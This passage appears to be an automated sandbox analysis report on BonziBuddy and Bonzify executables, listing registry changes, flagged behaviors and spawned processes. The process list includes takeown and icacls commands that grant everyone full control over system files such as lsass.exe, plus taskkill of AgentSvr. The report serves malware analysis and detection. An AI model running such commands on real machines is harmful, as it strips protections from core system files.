| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{53FA8D47-2CDD-11D3-9DD0-D3CD4078982A}\ProgID\ = "ActiveSkin.SkinPanel.1" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1EFB6594-857C-11D1-B16A-00C0F0283628}\ = "ITabStrip" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FE3-1BF9-11D2-BAE8-00104B9E0792}\ProgID\ = "Threed.SSCheck.3" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A7B93C91-7B81-11D0-AC5F-00C04FD97575}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Windows\msagent\AgentSvr.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6BA90C00-3910-11D1-ACB3-00C04FD97575}\ProxyStubClsid32 | C:\Windows\msagent\AgentSvr.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{53FA8D31-2CDD-11D3-9DD0-D3CD4078982A}\ProxyStubClsid32 | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{55DD814E-A1B7-4808-9625-4F75A3FAD8A7} | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{065E6FE0-1BF9-11D2-BAE8-00104B9E0792}\TypeLib\ = "{065E6FD1-1BF9-11D2-BAE8-00104B9E0792}" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FE3-1BF9-11D2-BAE8-00104B9E0792}\Implemented Categories\{40FC6ED4-2438-11CF-A3DB-080036F12502} | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{F5BE8BE1-7DE6-11D0-91FE-00C04FD701A5}\TypeLib\ = "{F5BE8BC2-7DE6-11D0-91FE-00C04FD701A5}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{53FA8D46-2CDD-11D3-9DD0-D3CD4078982A} | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BDD1F049-858B-11D1-B16A-00C0F0283628}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2334D2B3-713E-11CF-8AE5-00AA00C00905}\TypeLib\ = "{831FDD16-0C5C-11D2-A9FC-0000F8754DA1}" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BDD1F04A-858B-11D1-B16A-00C0F0283628}\ = "ListViewEvents" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FE9-1BF9-11D2-BAE8-00104B9E0792}\Version | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3CD19360-7454-11CE-9430-0000C0C14E92}\InprocServer32\ = "C:\\PROGRA~2\\BONZIB~1\\SSCALA32.OCX" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D45FD31B-5C6E-11D1-9EC1-00C04FD7081F}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{BDD1F04B-858B-11D1-B16A-00C0F0283628}\InprocServer32 | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\MSComctlLib.ImageListCtrl.2\CLSID\ = "{2C247F23-8591-11D1-B16A-00C0F0283628}" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\BonziCHECKERS.BonziCHECKERSControl\ = "BonziCHECKERS.BonziCHECKERSControl" | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EB52CF7B-3917-11CE-80FB-0000C0C14E92} | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{065E6FE9-1BF9-11D2-BAE8-00104B9E0792}\Implemented Categories\{40FC6ED4-2438-11CF-A3DB-080036F12502} | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{643F1350-1D07-11CE-9E52-0000C0554C0A}\ToolboxBitmap32 | C:\Users\Admin\Downloads\BonziBuddy432.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6BA90C01-3910-11D1-ACB3-00C04FD97575}\ = "IAgentCtlCommandsEx" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\BonziKill.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\BonziBuddy432.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Bonzify.exe:Zone.Identifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Trading.docx" /o ""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffe7e60ab58,0x7ffe7e60ab68,0x7ffe7e60ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1584 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2176 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2956 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3012 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4152 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4320 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4468 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4380 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4660 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4848 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x258,0x25c,0x260,0x234,0x264,0x7ff759b9ae48,0x7ff759b9ae58,0x7ff759b9ae68
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4380 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3100 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1816 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2956 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4160 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5048 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4984 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4976 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Users\Admin\Downloads\BonziKill.exe
"C:\Users\Admin\Downloads\BonziKill.exe"
C:\bonzi\BonziBuddy_original.exe
"C:\bonzi\BonziBuddy_original.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5360 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=5180 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5344 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=1816 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3424 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4556 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3828 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5064 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5536 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5528 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5532 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Users\Admin\Downloads\BonziBuddy432.exe
"C:\Users\Admin\Downloads\BonziBuddy432.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5148 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5460 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4724 --field-trial-handle=1788,i,17435400353378637376,133746111792591340,131072 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\BonziBuddy432\Runtimes\CheckRuntimes.bat" "
C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe
tv_enua.exe
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s C:\Windows\lhsp\tv\tv_enua.dll
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s C:\Windows\lhsp\tv\tvenuax.dll
C:\Windows\SysWOW64\grpconv.exe
grpconv.exe -o
C:\Users\Admin\Downloads\Bonzify.exe
"C:\Users\Admin\Downloads\Bonzify.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\KillAgent.bat"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im AgentSvr.exe
C:\Windows\SysWOW64\takeown.exe
takeown /r /d y /f C:\Windows\MsAgent
C:\Windows\SysWOW64\icacls.exe
icacls C:\Windows\MsAgent /c /t /grant "everyone":(f)
C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe
INSTALLER.exe /q
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Windows\msagent\AgentCtl.dll"
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Windows\msagent\AgentDPv.dll"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-lockapp.appxmain_31bf3856ad364e35_10.0.22000.348_none_e2c7a9ab59285812\f\LockApp.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-lockapp.appxmain_31bf3856ad364e35_10.0.22000.348_none_e2c7a9ab59285812\f\LockApp.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-lockapp.appxmain_31bf3856ad364e35_10.0.22000.348_none_e2c7a9ab59285812\f\LockApp.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Windows\msagent\mslwvtts.dll"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-lpksetup_31bf3856ad364e35_10.0.22000.348_none_1cb0f82bf1aef3cc\f\lpksetup.exe"
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Windows\msagent\AgentDP2.dll"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-lpksetup_31bf3856ad364e35_10.0.22000.348_none_1cb0f82bf1aef3cc\f\lpksetup.exe"
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Windows\msagent\AgentMPx.dll"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-lpksetup_31bf3856ad364e35_10.0.22000.348_none_1cb0f82bf1aef3cc\f\lpksetup.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Windows\msagent\AgentSR.dll"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-lpksetup_31bf3856ad364e35_10.0.22000.348_none_1cb0f82bf1aef3cc\f\lpremove.exe"
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s "C:\Windows\msagent\AgentPsh.dll"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-lpksetup_31bf3856ad364e35_10.0.22000.348_none_1cb0f82bf1aef3cc\f\lpremove.exe"
C:\Windows\msagent\AgentSvr.exe
"C:\Windows\msagent\AgentSvr.exe" /regserver
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-lpksetup_31bf3856ad364e35_10.0.22000.348_none_1cb0f82bf1aef3cc\f\lpremove.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\grpconv.exe
grpconv.exe -o
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-lsa-minwin_31bf3856ad364e35_10.0.22000.434_none_38ca096a17805fa9\f\lsass.exe"
C:\Users\Admin\AppData\Local\Temp\INSTALLER.exe
INSTALLER.exe /q
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-lsa-minwin_31bf3856ad364e35_10.0.22000.434_none_38ca096a17805fa9\f\lsass.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-lsa-minwin_31bf3856ad364e35_10.0.22000.434_none_38ca096a17805fa9\f\lsass.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-m..ndation-frameserver_31bf3856ad364e35_10.0.22000.469_none_b104ba5249e06dec\f\FsIso.exe"
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s C:\Windows\lhsp\tv\tv_enua.dll
C:\Windows\SysWOW64\regsvr32.exe
regsvr32 /s C:\Windows\lhsp\tv\tvenuax.dll
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-m..ndation-frameserver_31bf3856ad364e35_10.0.22000.469_none_b104ba5249e06dec\f\FsIso.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-m..ndation-frameserver_31bf3856ad364e35_10.0.22000.469_none_b104ba5249e06dec\f\FsIso.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\grpconv.exe
grpconv.exe -o
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-m..nt-browser.appxmain_31bf3856ad364e35_10.0.22000.120_none_f759261c81fa2ed8\f\SecureAssessmentBrowser.exe"
C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-m..nt-browser.appxmain_31bf3856ad364e35_10.0.22000.120_none_f759261c81fa2ed8\f\SecureAssessmentBrowser.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-m..nt-browser.appxmain_31bf3856ad364e35_10.0.22000.120_none_f759261c81fa2ed8\f\SecureAssessmentBrowser.exe" /grant "everyone":(f)
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\servicing\LCU\Package_for_RollupFix~31bf3856ad364e35~amd64~~22000.493.1.3\amd64_microsoft-windows-m..pickerhost.appxmain_31bf3856ad364e35_10.0.22000.282_none_08c227a0c7c9c4c1\f\ModalSharePickerHost.exe"
